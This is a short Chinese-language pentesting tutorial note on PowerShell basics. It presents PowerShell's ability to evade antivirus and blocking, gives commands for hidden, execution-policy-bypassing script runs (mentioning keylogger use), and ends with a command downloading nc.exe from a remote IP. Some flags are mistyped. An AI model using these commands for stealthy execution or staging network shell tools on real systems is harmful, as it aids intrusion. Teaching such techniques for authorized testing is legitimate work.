PowerShell基础
学习目标
了解powershell基础
掌握powershell的常用命令
掌握powershell的执行策略
了解后续工作中powershell的使用场景与集成攻击框架工具安装
简介
Powershell是运行在windows机器上实现系统和应用程序自动化的命令行脚本环境。
特点:
在windows以上版本的操作系统中是默认安装的脚本
可以在内存中运行,不需要写入磁盘
几乎不会触发杀毒软件
可以远程执行
目前很多工具都是基于powershell开发的
使windows脚本的执行变得更容易
cmd.exe的运行通常会被阻止,但是powershell的运行通常不会被阻止
可用于管理活动目录
在powershell中是不区分大小写的,命名规范采用的是“动词-名词”
命令
绕过本地执行:
powershell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隐藏绕过权限执行脚本:
PowerShell.exe -ExecutionPolicy -NoLogo -Nonlnteractive -NoProfile -WindowStyle hidden -ExecutionPolicy Bypass - file xxx.ps1
(ExecutionPolicy Bypass:绕过执行安全策略,这个参数非常重要,在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数)
WindowStyle hidden:隐藏窗口
NoLogo:启动不显示版权标志的PowerShell
Nonlnteractive(-Nonl):非交互模式,PowerShell不为用户提供交互的提示
NoProfile(-Nop):PowerShell控制台不加载当前用户的配置文件
Noexit:执行后不退出Shell。这在使用键盘记录脚本时非常重要)
powershell下载远程数据:
powershell wget "http://172.16.0.107:8000/nc.exe" -outfile "nc.exe"